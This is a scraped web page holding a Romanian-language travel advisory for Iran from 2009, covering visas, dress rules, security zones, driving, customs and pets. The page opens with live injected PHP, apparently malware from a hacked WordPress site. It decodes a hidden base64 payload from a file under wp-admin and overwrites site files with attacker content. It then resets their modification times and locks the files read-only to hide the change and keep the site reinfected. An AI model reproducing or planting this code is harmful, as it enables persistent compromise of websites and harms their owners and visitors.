$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Iran – O noua atitudine

Iran

Ultima actualizare:

5 august 2009

Condiţii de intrare şi regim de şedere

În Republica Islamică Iran se poate intra numai pe bază de viză.

Intrarea în Iran este permisă cu paşaportul valabil cel puţin 6 luni de la data intrării pe teritoriul acestui stat şi viza aferentă.

Toate tipurile de viză se obţin de la Ambasada Republicii Islamice Iran în România.

Grupurile organizate de turişti pot obţine viza de intrare de la autorităţile de frontieră. Această viză este valabilă cel mult 14 zile

Atenţie! Turiştii nu sunt exceptaţi de la aplicarea legilor islamice în privinţa vestimentaţiei, în special persoanele de sex feminin (corpul si capul trebuie să fie în permanenta acoperite). In cazul bărbaţilor nu este permis portul pantalonilor scurţi în public.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Ameninţări teroriste

Vă recomandăm să evitaţi zonele de graniţa cu Irak, Pakistan si Afganistan, in special Sistan – Balucistan, Khorassan meridional şi regiunea Hormuzgan.

Nu sunt, de asemenea, recomandate călătoriile în zonele din estul oraşului Kerman şi mai ales călătoria terestră la Bam.

Vă recomandăm să urmăriţi în permanenţă anunţurile şi recomandările făcute de autorităţile iraniene şi să accesaţi periodic pagina web a Ministerului român al Afacerilor Externe (www.mae.ro).

Siguranţa si criminalitate

În general, în Iran fenomenul infracţional este relativ scăzut.

Tipuri de infracţiuni frecvente: furturi din buzunare, poşete, autoturisme, furturi de automobile, jefuiri, înşelăciuni, trafic de valută.

Autorităţile iraniene aplică sancţiuni financiare, în valoare de 30 euro/zi pentru cetăţenii străini a căror intrare sau şedere în Iran este considerată neautorizată. Vă recomandăm deţineţi în permanenţă la dumneavoastră actele necesare în vederea demonstrării îndeplinirii condiţiilor de intrare şi şedere legală în Iran.

Sistemul medical

Vă recomandăm încheierea unei asigurări medicale, de viaţă şi de călătorie înaintea deplasării dumneavoastră în Iran.

Condiţii privind traficul auto

  • Circulaţia auto:
    Se desfăşoară pe partea dreaptă a drumurilor publice.
    Traficul auto in Iran este aglomerat, semnele si regulile de circulaţie fiind prea puţin respectate de localnici.
    Exista sisteme rent-a-car, dar si închirieri de autoturisme cu şofer.
    Intrarea in Iran cu un autoturism înmatriculat in străinătate se face doar in baza unui „carnet de passage”, eliberat de autorităţile rutiere din tara de reşedinţa (gen ACR in România).
  • Permisul de conducere:
    În Iran permisul naţional românesc este valabil numai împreună cu permisul internaţional de conducere, pentru o perioada de o luna, ulterior fiind necesara obţinerea unui permis iranian.
  • Transportul public:
    Transportul rutier cuprinde aproape toate localităţile, infrastructura fiind foarte dezvoltata.
    ÎnTeheran exista mijloace de transport in comun diverse (autobuze, taxiuri, o linie de metrou si o linie de troleibuze), cel mai des folosite fiind serviciile de taximetrie.Transportul feroviar se afla in curs de dezvoltare.
  • Informaţii privind cazurile de accidente de circulaţie:
    În cazul unui accident de circulaţie vă recomandăm contactarea de urgenta a Ambasadei României din Teheran.
    Nu deplasaţi autoturismul de la locul accidentului, indiferent de gravitatea acestuia sau de blocarea traficului rutier.

Utilizarea cărţilor de credit

Numărul magazinelor şi al instituţiilor locale care accepta cărţile de credit este relativ redus.

Cardurile internaţionale de debit sau credit nu funcţionează. Schimbul valutar se face numai la bănci sau la casele de schimb.

Reglementari vamale

Este interzisă introducerea în Iran a produselor si materialelor care contravin legilor islamice (alcool, produse din carne de porc, materiale cu conţinut pornografic, materiale muzicale care contravin perceptelor islamice).

La export este interzisă scoaterea caviarului in cantităţi ce depăşesc 250 gr.

Informaţii suplimentare se pot obţine la Customs of the Islamic Republic of Iran, Corner of Miremad Street – Shahid Beheshti Ave. TEHERAN 15875/6834 – Tel.: (98)-21-88501425/30.

Regimul medicamentelor

Este interzis exportul/importul neautorizat de produse farmaceutice, în cantităţi ce depăşesc uzul personal.

Consumul şi activităţile comerciale cu substanţe psihotrope este interzis.

Regimul animalelor de companie

Introducerea animalelor de companie in Iran este permisă in baza documentelor de călătorie eliberate de autorităţile veterinare din ţară. Vă recomandăm să nu călătoriţi în Iran însoţiţi de câini.

By o9admin